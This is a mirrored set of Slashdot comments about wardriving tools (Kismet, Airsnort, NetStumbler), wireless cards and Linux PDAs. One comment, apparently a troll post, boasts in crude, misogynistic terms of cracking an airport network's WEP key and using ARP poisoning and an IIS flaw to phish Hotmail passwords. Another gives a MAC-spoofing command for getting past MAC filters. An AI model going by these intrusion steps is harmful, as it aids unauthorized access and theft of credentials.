Slashdot Mirror

Somehow I don't think they can crack them that quickly, can they? Don't they need a decent sampling of packets?

Airsnort used to need about 100meg worth of data (not just SSID broadcast packets) to crack 128bit WEP. Sometimes it needed less, sometimes more. Either way they'd have had to do a little bit of circling to get that much data :)

They'd have had a little more fun had they used Kismet. Then they've have picked up some of the AP's that weren't broadcasting SSID's (kismet works in promiscuous (sp) mode, while Netstumbler is very chatty) and would have gotten a better idea of how many AP's were set to their factory defaults.

Likewise, I've also been able to use the Linux-WLAN-NG drivers to make various wireless adapters work under Redhat Linux versions 7.2 and 9. The devices that I have actually used successfully are:

• Proxim RangeLan-DS PC Card (oddly enough I can't get this card to work under Windows 98 or XP)
• Linksys WPC-11 v.3 PC Card
• Microsoft(!) MN-510 USB wireless adapter (works pretty well with Kismet)

I noticed that the README file included in the download mentioned a "BroadCom" wireless card. I'm curious as to whether or not this is the newer Linksys PCI wireless card (WMP11) which used to work with Linux-WLAN-NG before they changed the friggin' chipset from Prism2 to Broadcom.

Prepare to be impressed. Wireless works in a moving vehicle (although, obviously the preferred mode for drivers is parking-lot surfing).

Looky here, this is what the PCMCIA sockets are for: Stumbler, Kismet, Paketto, etc....

WiFi usage must have really taken off recently. I was visiting Canada only nine months ago, visiting an old girlfriend who I had met while at University. The purpose of the trip was to meet her family and spend thanksgiving with them.

I arrived in Toronto airport with my trusty 17' TiBook and wanted to check my email but couldn't find any open AP's. Well I thought to my self, "fuck you asshole Canadians", rebooted my laptop into Gentoo and opened up Kismet, one of the private nets was very hight traffic and it only took a matter of hours to pick up enough packets to figure out their password. I had the time while I was waiting to be picked up, they were caught up in bad weather.
So anyway I was in the network, which was mostly running Windows.

I was amazed at what I found, it looked as though I was into British Airways private network, there were some machines that I could not access but the majority were unpatched Win2k servers with IIS running. At this moment I felt a slight tingling in my pants and a couple of seconds later a full blown erection. I considered for a moment what havoc I could cause, I decided it would be funny to steal these whore chekout sluts' hotmail passwords and send fake emails to their boyfriends. I'm jelous and if I being a GNU/Linux hippy can't have girls, these football team captins should not either.

This is how I executed my evil plan:

• ARP poisioning the netowrk so that whenever somone requests hotmail.com it goes to one of the unpatched IIS Win2k servers.

• Using the double unicode decode vunerability, I changed the defualt page to a copy of hotmail.com but with a little ASP script which dumped usernames and passwords to a file then redirect them to the real hotmail.

• Spent the next few hours sennding "I FOUND A NEW BF U SUXOR" emails to everyone in their address books.

Coming into the WiFi game a little later than most, I was under the mistaken impression that filtering by MAC address was secure. Then I followed a link from this thread to the Kismet site and realized just how idiotic that belief was. Encrypted or not, the TCP stack is going to carry the MAC of the sender.

In the end, I guess it's very much like locking your car door. It'll disuade the casual thief but if someone really wants to get in, they're going to get in.

What does this package offer that Kismet doesn't?

Some stolen source code and ideas?

Kismet definitily is the "Snort" of wireless detection, just like every other IDS company using snorts "engine".

-Rob

I run Familiar on my Compaq (now HP) iPaq handheld. Very sweet. Get a PCMCIA sleeve, a wireless card, and you're all set. For those of you doing wireless security work, Kismet runs beautifully. There's also a GTK or Qt base available for you developers.

• The identifier you are referring to is the SSID (Service Set Identifier).
• wardriving programs operate by putting the wlan card into promiscuous mode and sniffing all the wireless traffic passing through the air. I beleive that they also send out probes for SSIDs.
• If you are not using WEP (Wired Equivalent Privacy), then everything transmitted is cleartext. However, WEP has been proven insecure, and should not be relied on for any sensitive data.

Kismet - Wardriving application for Linux
Airsnort - On-the-fly WEP cracking for Linux

Even though you are probably the only one using your wireless router, someone clever running a program like Kismet or Ethereal can still sniff your unencrypted packets and pick out some nasty things from them. You're definitely right about WEP not being secure, but I do think that another layer of security can't hurt (unless of course it does something weird like make your connection flaky).

:)

• Knoppix, just in case
• a Debian disc for good measure
• a muLinux diskette helps, too
• a separate CD with things ranging from Linux kernels, mp3s, any documentation you'll need, web comics, to a small window manager of your choice
• Kismet, Ettercap, Ethereal for when you feel adventurous

The sharp zaurus is one of the best tools ever. I have used it in many different situations where before I would have had to grab my laptop. Using Minicom I have programmed routers with the nifty serial cable. I have spent many hours playing Dopewars and Wyvern (a pretty nifty graphical mud). The sharp image comes with Opera and is readable even at the furthest zoom (-4 or something.) My options are NOT restricted by sharp, there is even OpenZaurus (or OZ as the Z junkies call it.) The walkthroughs on the pages are mostly made for Linux noobs.

It runs Kismet (with the special socket drivers I can run low power for about 2 hours.) The software library is always growing, and the developers are happy to share their techniques for cross compiling/QT developing.

The wonderful thing about the Zaurus, is people already have developed and even COMPILED programs for the arm that run just fine on the Z, (mostly Ipaq/other linux SA device developers) but that means an even BIGGER software library.

The community is so helpful, you may be asking questions in the #zaurus channel in irc.openprojects.org and the person answering your question, just might have been the one developing the program you are asking about. It is not infrequent to hear "#Zaurus:So_and_so Yeah here that version is kinda buggy, I just compiled the new one here."

I have to mention Zauruszone even though it is no where near the community it used to be, there still are useful links

except mac addresses can be changed on wifi cards just like normal ethernet cards - so all it takes is sniffing long enough to find a legit mac then ifconfig eth0 hw ether de:ad:be:ef:00

useful link: kismet

If I'm having problems with range on the internal Airport card, I put in my PCMCIA card (in linux) and use that.

Don't usually need it at work or at school, but if I'm really having problems with signal strength, the PCMCIA card works much better. Also get much better reception for war driving. I love kismet

.:diatonic:.

Honestly, the best thing to do is get yourself a Linux partition and use Kismet. It's very simple to set up, works with almost any card, and has far more features than Netstumbler. Hook it up with a GPS and you'll be making maps, etc.

It also is completely passive (so most likely legal, since 2.4ghz is a public band with no regulations on it) and anything it hears, not just AP broadcasts, are logged. You can drive around, then throw Ethereal up and see what data you happened to grab. All completely passively.

Check out the kismet site for more information. Here is a map I made of downtown Ann Arbor. No intrusions were performed, SSIDs are purposefully left off the map, and the colors are completely arbitrary. I'm interested in what is where. Not using other people's bandwidth/networks.

Honestly, the best thing to do is get yourself a Linux partition and use Kismet. It's very simple to set up, works with almost any card, and has far more features than Netstumbler. Hook it up with a GPS and you'll be making maps, etc.

It also is completely passive (so most likely legal, since 2.4ghz is a public band with no regulations on it) and anything it hears, not just AP broadcasts, are logged. You can drive around, then throw Ethereal up and see what data you happened to grab. All completely passively.

Check out the kismet site for more information. Here is a map I made of downtown Ann Arbor. No intrusions were performed, SSIDs are purposefully left off the map, and the colors are completely arbitrary. I'm interested in what is where. Not using other people's bandwidth/networks.

Even here in the "backward south" we're going wireless (eventually). The College of Charleston, whose Computer Science department was rated best in the Southeast, has a campuswide wireless network put together. Maybe by the time next semester rolls around they'll turn it on. Until then, I'm relegated to the wireless network in and around the J.C. Long building (which covers Andolini's Pizza, behind J.C. Long) and any other networks I can sniff out with Kismet.

For you Linux users out there, who can't run NetStumbler, check out Kismet.

I've never ran NetStumbler, but it finds access points, has GPS support, makes maps, and will run on Linux PDA's (iPAQ, Zaurus).

The FBI agent in question issued the warning for
Pittsburgh, home of Carnegie Mellon University (so what?) Well CMU has one of the most elaborate wireless networks in the country, and a whole bunch of guys who are experts at using it (and probably are responsible for many of the chalkings).
Also, I have an access point I was using at my old school in Indiana where very few other people
had wireless setups (Purdue only had it in 2 buildings, but that has expanded since I left). Anyway, my point is that from my room in a Pittsburgh townhouse, Kismet found 2 other access points, and I'm sure that would only grow if I went war-walking with my laptop. I'm no longer using the access point, because even though it might sound cool to share your connection, if you can't control who is using it, you run all kinds of risk for legal liability. If someone were to use an access point I owned to trigger DDOS attacks, I would be the one to get screwed, and wireless just makes doing that a little too easy.

So far I find my Zaurus to be really useful. When out and about I use it as an mp3 player, play games on it, and my new hobby -- searching for wireless networks. At home I SSH into it and use it as if it was just another headless linux box. It will be even better once the Debian port is complete and there is easy access to all of the Debian Arm packages.

The trusty Lucent/Agere Orinoco card, under Linux, can set MAC address with the standard 'ifconfig hw ether xx:xx:xx:xx:xx:xx' command - note, this only works with newer versions of the orinoco driver.

A MAC hopper wouldn't work too well, considering you must take the interface down to set MAC (this would obviously de-associate you from the AP).

I recommend using Snax's patches to enable RF Monitor mode as well, for use with Kismet, an excellent passive 802.11b scanner.

I strongly second this. I've got a Zaurus and a SMC 2642w wireless NIC and betweeh ssh/telnet/samba/apache/vnc server/vnc client/etc... it does everything I could possibly want and then some. I use it all the time to diagnose wireless problems as well as look for insecurities with tools like kismet

The Zaurus SL-5500 supports the D-Link DCF-650W out of the box. Just plug in the CompactFlash 802.11 card, and configure the SSID and WEP settings in the standard config app, and you're off and running.

The included Opera browser does a good job of scaling pages to the small PDA display.

And, since it's Linux, there is no end to the cool apps you can run on it. Check out Kismet. It's an 802.11 sniffer program, great for "War Driving". Between my office and home, I picked up 80 different 802.11 networks on one trip. I am in Silicon Valley, so your results may vary. But, it's great for finding public access points too (whether they are intentionally or accidentally public).